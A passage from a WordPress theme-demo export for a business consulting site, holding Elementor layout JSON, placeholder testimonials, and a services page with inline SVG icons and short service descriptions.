More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"e248180","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"ec9ed31","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"6dc6dd7","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"7a91f5f","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":1989},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5e9f9e9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a13a110","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":1990},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5df37f4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1cb357c","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":1991},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"da8c1a3","elType":"section","settings":{"background_background":"classic","background_color":"#F8F8F8","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-grid.jpg","id":1993},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"padding":{"unit":"px","top":"150","right":"0","bottom":"120","left":"0","isLinked":false},"gap":"extended","structure":"20","background_position_tablet":"center right","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e17a0cf","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[],"isInner":false},{"id":"46be8a0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b31309c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"1cb8d1d","elType":"widget","settings":{"align":"left","testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"","id":""},"tname":"Oliver Simson","tjob":"client of company","_id":"4071f49"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Mary Grey","tjob":"client of company","_id":"0a8366e"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Samanta Fox","tjob":"client of company","_id":"aeffe7c"}],"dots_style":"vertical","dots_spacing":{"unit":"px","size":-300,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-70,"sizes":[]},"_margin":{"unit":"%","top":"0","right":"-5","bottom":"0","left":"0","isLinked":false},"arrow_align":"bottom","_padding_tablet":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"job_color":"#8D8D8D","job_typography_typography":"custom","job_typography_font_family":"Raleway","job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"job_typography_font_weight":"500"},"elements":[],"widgetType":"itestimonials2"}],"isInner":false}],"isInner":false},{"id":"1ce3e2f","elType":"section","settings":{"background_background":"classic","background_color":"#262832","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fe015a4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"719b6b2","elType":"widget","settings":{"image_carousel":[{"_id":"e5f9d6d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":2002},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"5966eb5","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":2003},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"d89b073","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":2004},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"6663b67","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":2005},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"23bce51","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":2006},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"70a824d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":2007},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}}],"tshow":"6","tshow_tablet":"3","dots":"false"},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:10;}}s:8:"advanced";a:1:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:29:"stitle_typography_font_family";i:1;s:29:"stitle_typography_font_weight";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:5;}s:14:"section_layout";a:2:{s:6:"layout";i:4;s:3:"gap";i:4;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:8:{s:21:"background_background";i:3;s:16:"background_color";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_position_tablet";i:1;}}}}s:10:"iimage_box";a:3:{s:5:"count";i:8;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:8;s:4:"link";i:8;s:5:"title";i:7;s:3:"des";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:10:"radius_box";i:8;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:5:"align";i:1;s:12:"testi_slider";i:1;s:10:"dots_style";i:1;s:11:"arrow_align";i:1;}}s:5:"style";a:2:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}s:11:"style_tinfo";a:5:{s:9:"job_color";i:1;s:25:"job_typography_typography";i:1;s:26:"job_typography_font_family";i:1;s:24:"job_typography_font_size";i:1;s:26:"job_typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services With Icon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/</link>
		<pubDate>Fri, 11 Sep 2020 10:16:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=885</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business
<h3>We Offer Great
Number of Finance Services</h3>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
<g>
<circle cx="75.64" cy="303.31" r="10"></circle>
</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>
Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/" class="link-details"> Learn More</a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve"></svg>
<g>
<g>
<circle cx="10.06" cy="500.446" r="10.06"></circle>
</g>
</g>
<g>
<g>
<circle cx="267.005" cy="245.308" r="10.04"></circle>
</g>
</g>
<g>
<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>
Analysis of internal processes &amp; procedures, staff activity evaluation, evaluation of technologies.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/" class="link-details"> Learn More</a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
<circle cx="254.4" cy="237.32" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="172.07" cy="55.21" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="254.4" cy="290.4" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="254.4" cy="343.47" r="10"></circle>
</g>
</g>
<g>
<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>
Successful experience of experts in structuring investment projects, developing and implementing.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/" class="link-details"> Learn More</a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
<circle cx="254.4" cy="237.32" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="172.07" cy="55.21" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="254.4" cy="290.4" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="254.4" cy="343.47" r="10"></circle>
</g>
</g>
<g>
<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>
Successful experience of experts in structuring investment projects, developing and implementing.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/" class="link-details"> Learn More</a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
<g>
<circle cx="119.779" cy="107.869" r="10"></circle>
</g>
</g>
